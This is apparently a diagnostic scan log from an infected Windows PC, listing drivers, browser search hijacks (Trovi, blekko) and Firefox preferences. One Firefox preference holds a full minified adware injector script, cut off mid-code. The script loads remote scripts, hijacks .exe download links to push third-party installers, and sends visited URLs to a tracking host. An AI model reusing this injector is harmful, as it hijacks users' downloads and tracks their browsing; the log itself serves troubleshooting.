DRV:64bit: - [2014/03/30 01:26:02 | 000,129,944 | ---- | M] (Power Software Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\scdemu.sys -- (SCDEmu)
DRV:64bit: - [2014/03/27 22:14:26 | 000,192,792 | ---- | M] (AVG Technologies CZ, s.r.o.) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\avgidsha.sys -- (AVGIDSHA)
DRV:64bit: - [2014/03/27 22:14:24 | 000,153,368 | ---- | M] (AVG Technologies CZ, s.r.o.) [File_System | System | Running] -- C:\Windows\SysNative\drivers\avgdiska.sys -- (Avgdiska)
DRV:64bit: - [2014/03/27 22:07:10 | 000,236,824 | ---- | M] (AVG Technologies CZ, s.r.o.) [File_System | System | Running] -- C:\Windows\SysNative\drivers\avgldx64.sys -- (Avgldx64)
DRV:64bit: - [2014/03/27 22:05:02 | 000,324,376 | ---- | M] (AVG Technologies CZ, s.r.o.) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\avgloga.sys -- (Avgloga)
DRV:64bit: - [2014/03/27 22:03:16 | 000,032,536 | ---- | M] (AVG Technologies CZ, s.r.o.) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\avgrkx64.sys -- (Avgrkx64)
DRV:64bit: - [2013/09/26 09:44:54 | 000,057,144 | ---- | M] (AVG Technologies CZ, s.r.o.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\avgfwd6a.sys -- (Avgfwfd)
DRV:64bit: - [2013/03/18 17:51:08 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:64bit: - [2013/02/12 15:51:52 | 000,042,184 | ---- | M] (AnchorFree Inc.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\hssdrv6.sys -- (HssDRV6)
DRV:64bit: - [2013/01/20 16:59:04 | 000,130,008 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\NisDrvWFP.sys -- (NisDrv)
DRV:64bit: - [2013/01/10 14:44:02 | 000,042,184 | ---- | M] (Anchorfree Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\taphss6.sys -- (taphss6)
DRV:64bit: - [2012/12/03 17:36:34 | 000,081,824 | ---- | M] (Wacom Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wachidrouter.sys -- (WacHidRouter)
DRV:64bit: - [2012/12/03 17:36:34 | 000,013,728 | ---- | M] (Windows ® Win 7 DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hidkmdf.sys -- (hidkmdf)
DRV:64bit: - [2012/11/26 20:31:40 | 000,111,696 | ---- | M] () [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NIWinCDEmu.sys -- (NIWinCDEmu)
DRV:64bit: - [2012/11/15 10:41:06 | 000,015,776 | ---- | M] (Wacom Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wacomrouterfilter.sys -- (wacomrouterfilter)
DRV:64bit: - [2012/08/21 13:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:64bit: - [2012/05/12 12:31:00 | 000,121,416 | ---- | M] (MotioninJoy) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\MijXfilt.sys -- (MotioninJoyXFilter)
DRV:64bit: - [2012/03/01 01:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2011/12/07 19:42:28 | 000,074,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\xusb21.sys -- (xusb21)
DRV:64bit: - [2011/11/03 03:01:00 | 000,056,208 | ---- | M] (Rovi Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\PxHlpa64.sys -- (PxHlpa64)
DRV:64bit: - [2011/07/12 20:52:06 | 002,165,360 | ---- | M] (VIA Technologies, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\viahduaa.sys -- (VIAHdAudAddService)
DRV:64bit: - [2011/06/10 01:34:52 | 000,539,240 | ---- | M] (Realtek                                            ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt64win7.sys -- (RTL8167)
DRV:64bit: - [2011/05/10 04:41:27 | 000,174,184 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nvhda64v.sys -- (NVHDA)
DRV:64bit: - [2011/03/11 01:41:12 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2011/03/11 01:41:12 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2011/02/11 09:36:12 | 000,848,384 | ---- | M] (Realtek Semiconductor Corporation                           ) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\RTL8192cu.sys -- (RTL8192cu)
DRV:64bit: - [2010/12/15 10:06:46 | 000,047,232 | R--- | M] (Advanced Micro Devices) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\usbfilter.sys -- (usbfilter)
DRV:64bit: - [2010/11/20 22:24:33 | 000,059,392 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2010/11/20 22:23:47 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2010/11/20 22:23:47 | 000,031,232 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:64bit: - [2010/06/29 16:01:04 | 000,011,832 | ---- | M] (Advanced Micro Devices Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdide64.sys -- (amdide64)
DRV:64bit: - [2010/06/21 17:56:20 | 000,027,240 | ---- | M] (Realtek Semiconductor Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rtlss.sys -- (rtlss)
DRV:64bit: - [2010/01/29 01:04:38 | 000,036,720 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\nx6000.sys -- (MSHUSBVideo)
DRV:64bit: - [2009/07/13 20:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009/07/13 20:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009/07/13 20:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009/06/22 16:50:00 | 000,291,352 | ---- | M] (silex technology, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\sxuptp.sys -- (sxuptp)
DRV:64bit: - [2009/06/10 15:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009/06/10 15:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009/06/10 15:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009/06/10 15:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:64bit: - [2009/03/18 17:35:42 | 000,033,856 | -H-- | M] (LogMeIn, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hamachi.sys -- (hamachi)
DRV - [2012/08/01 15:44:04 | 000,014,544 | ---- | M] (OpenLibSys.org) [File_System | On_Demand | Stopped] -- C:\Program Files (x86)\Razer\Razer Game Booster\Driver\WinRing0x64.sys -- (WinRing0_1_2_0)
DRV - [2009/07/13 20:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {6A1806CD-94D4-4689-BA73-E35EA1EA9990}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE:64bit: - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...g}&sourceid=ie7
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\..\SearchScopes,DefaultScope = {6A1806CD-94D4-4689-BA73-E35EA1EA9990}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...g}&sourceid=ie7
 
 
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
 
 
IE - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.trovi.com...AB6019E94&SSPV=
IE - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
IE - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
IE - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = C6 13 FC D9 B8 51 CD 01  [binary data]
IE - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000\..\SearchScopes,DefaultScope = {95B7759C-8C7F-4BF1-B163-73684A933233}
IE - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...Box&FORM=IE10SR
IE - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000\..\SearchScopes\{3BD44F0E-0596-4008-AEE0-45D47E3A8F0E}: "URL" = http://blekko.com/ws...q={searchTerms}
IE - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...1I7ADFA_enUS490
IE - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000\..\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}: "URL" = http://isearch.avg.com/search?cid={636196D1-FE70-4678-8956-109E454B61CE}&mid=2c434db7f12d47d0af1bc13194d1ac50-ad1491be2ce6c122f6b66faa90e70c2decf7d34c&lang=en&ds=AVG&pr=fr&d=2012-11-10 23:17:47&v=15.2.0.5&pid=avg&sg=0&sap=dsp&q={searchTerms}
IE - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-21-1681504733-1289828258-2380439542-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local
 
 
========== FireFox ==========
 
FF - prefs.js..browser.search.defaultenginename: "Trovi search"
FF - prefs.js..browser.search.order.1: "blekko"
FF - prefs.js..browser.search.selectedEngine: "Trovi search"
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..browser.startup.homepage: "http://www.trovi.com...B6019E94&SSPV="
FF - prefs.js..extensions.50ad158017616.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"easylifeapp.com\")>-1||url.match(/ressbar.com[^f]+fid=65017/)||url.indexOf(\"form=u064ht&pc=u064\")>-1||url.indexOf(\"source=45905810\")>-1||url.indexOf(\"source=532d277e\")>-1||url.indexOf(\"aro.com/ws/?source=6974b128\")>-1||url.indexOf(\"esmoke.com/?isid=9949\")>-1||url.indexOf(\"esmoke.com/?isid=9950\")>-1||url.indexOf(\"esmoke.com/?isid=9951\")>-1||url.indexOf(\"id=webpick_ot\")>-1||url.indexOf(\"id=wbpk_ot\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"hash=a4vxy8\")>-1||url.indexOf(\"hash=m5g73j\")>-1||url.indexOf(\"hash=hg7gja\")>-1||url.indexOf(\"hash=fz61s5\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=1i5w2d\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=b3qau4\")>-1||url.indexOf(\"hash=ijeqe4\")>-1||url.indexOf(\"duit&ptag=AA7AAB832A2DE41458BF&\")>-1||url.indexOf(\"duit&ptag=A93F650AC0E6A4A4791F&\")>-1||url.indexOf(\"duit&ptag=A79888693F6CA4634A6F\")>-1||url.indexOf(\"duit&ptag=A359B17B6FAA44E6B86F\")>-1||url.indexOf(\"ISID=MF245F633-E188-4162-B56A\")>-1||url.indexOf(\"SID=MEABFCF9A-556B-4C5C-8727\")>-1||url.indexOf(\"ISID=M8FBC22FE-AB08-464E-AA63\")>-1||url.indexOf(\"uid=531364863_132823_4252277E\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"search?hspart=webpick&hsimp=yhs-1&p=\")>-1||url.match(/search.yahoo.com.+hspart=.+/)||url.match(/websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|greatresults|youwillfind|lookforitthere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|searchisfun|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches).info/)||url.match(/search.(easylifeapp|gboxapp|searchonme|appsarefun|genieo).com/)||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"vatican.com\")>-1||url.indexOf(\"deadsea.com\")>-1||url.indexOf(\"iklk.com\")>-1){return}}catch(e){};if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1545/l.js?aoi=1311798366&pid=1545&zoneid=287611&ext=Download%20and%20Sa&systemid=0\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//www.superfish.com/ws/sf_main.jsp?dlsource=cbsdownloadnsave&userId=1470661514&CTID=p34';document.getElementsByTagName(\"head\")[0].appendChild(script);};try{if(\"http:\"==window.self.location.protocol){var _e=document.createElement(\"div\");_e.id='_dyhb23rg4374';_e.style=\"display:none\";document.getElementsByTagName(\"body\")[0].appendChild(_e)}}catch(e$$10){};;objec2string=function(b){return\"{\"+function(b){var d=[],e,f;for(f in b)b.hasOwnProperty(f)&&(e=b[f],d[d.length]=e&&\"object\"==typeof e?f+\":{ \"+arguments.callee(e).join(\", \")+\"}\":\"string\"==typeof e?[f+': \"'+e.toString()+'\"']:[f+\": \"+e.toString()]);return d}(b).join(\", \")+\"}\"};var _xtrg={host:\"http://continuetosave.info\",ls:!1,init:function(b){-1<window.self.location.href.indexOf(_xtrg.host)||-1<window.self.location.href.indexOf(\"cebook.com\")||((\"undefined\"==typeof localStorage||\"undefined\"==typeof postMessage)&&b(!1),OnMessage=function(b){if(b.origin==_xtrg.host)try{_xtrg.ls=JSON.parse(b.data)}catch(d){}},window.addEventListener?window.addEventListener(\"message\",OnMessage,!1):window.attachEvent&&window.attachEvent(\"onmessage\",OnMessage),_xtrg.createIframe(_xtrg.host+\"/xtrg.html\",function(){b(1)}))},createIframe:function(b,c){try{ifr=document.createElement(\"iframe\"),ifr.src=b,ifr.setAttribute(\"style\",\"width:0;height:0;display:none\"),ifr.setAttribute(\"class\",\"_xtrg\"),document.getElementsByTagName(\"body\")[0].appendChild(ifr),c&&(ifr.onload=function(){setTimeout(c,1)})}catch(d){}},clean:function(){try{var b=document.getElementsByClassName(\"_xtrg\");for(i=0;i<b.length;i++)b[i].parentNode.removeChild(b[i])}catch©{}},set:function(b,c){b.expired=b.expired?b.expired:0;_xtrg.createIframe(_xtrg.host+\"/xtrg.html?\"+b.key+\"=\"+b.value+\";\"+b.expired,c)},get:function(b){return _xtrg.ls&&_xtrg.ls?_xtrg.ls:!1}},irins={init:function(){var b=document.getElementsByTagName(\"a\");if(b&&b.length){var c=0;for(i=0;i<b.length;i++){var d=b[i].getAttribute(\"href\");d&&!(-1==d.indexOf(\".exe\")&&-1==d.indexOf(\".msi\"))&&c++}c&&_xtrg.init(function©{if(c&&!_xtrg.get(\"c\"))for(i=0;i<b.length;i++)(c=b[i].getAttribute(\"href\"))&&!(-1==c.indexOf(\".exe\")&&-1==c.indexOf(\".msi\"))&&b[i].setAttribute(\"omzy_irini\",\"irini\")})}}};if(window.self==window.top)try{var a=objec2string(_xtrg);script=document.createElement(\"script\");script.type=\"text/javascript\";script[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"try{var _xtrg = \"+a+\";(function(){ var irins = \"+objec2string(irins)+\".init();})()}catch(e){}\";script.onload=script.onreadystatechange=function(){if(!this.readyState||\"loaded\"==this.readyState||\"complete\"==this.readyState)script.onload=script.onreadystatechange=null,document.getElementsByTagName(\"head\")[0].removeChild(script)};document.getElementsByTagName(\"head\")[0].appendChild(script)}catch(e$$16){}setTimeout(function(){var b=document.getElementsByTagName(\"a\");for(i=0;i<b.length;i++){var c=b[i].getAttribute(\"href\");b[i].getAttribute(\"omzy_irini\")&&(c&&!(-1==c.indexOf(\".exe\")&&-1==c.indexOf(\".msi\")))&&(b[i].onclick=function(){this.onclick=null;if(localStorage.getItem(\"c\"))return!0;localStorage.setItem(\"c\",\"yes\");_xtrg.set({key:\"c\",value:\"yes\"},function(){setTimeout(function(){window.self.location.href=\"http://storagenl.info/v388/?installer_file_name=setup\"},10);window.open(\"http://get.gboxapp.com/c/\",null,\"width=1024,width=768\");try{window.open().close()}catch(b){}});return!1})}},333);;window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.4.1\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var g=new Date;g.setTime(g.getTime()+864E5*b);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c;\" \"==g.charAt(0);)g=g.substring(1,g.length); if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};a.ajax={get:function(c,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange= function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};a.waitForTokens={};a.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all©; clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!= typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1< b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b= new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()};a.msie=function(){var a= parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};a.match_url= function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\",\"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname);f.src= b.pixelHost+\"?hid=0&eid=15&pid=34&prodid=186&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=US&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\", \"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0; c.callback=a;c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\")||b.utils.query_selector_all(\".tn\");if(b.utils.isFalse(a))if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&&(b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\", dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\", dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs  a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\",\"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a= b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"==a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/search.php?q*\",\"http://search.incredimail.com/search.php?q*\"],src_for_keyword:\"#q\",validate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\", \".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"],src_for_keyword:\"#searchboxinput\",tweak:function(){var 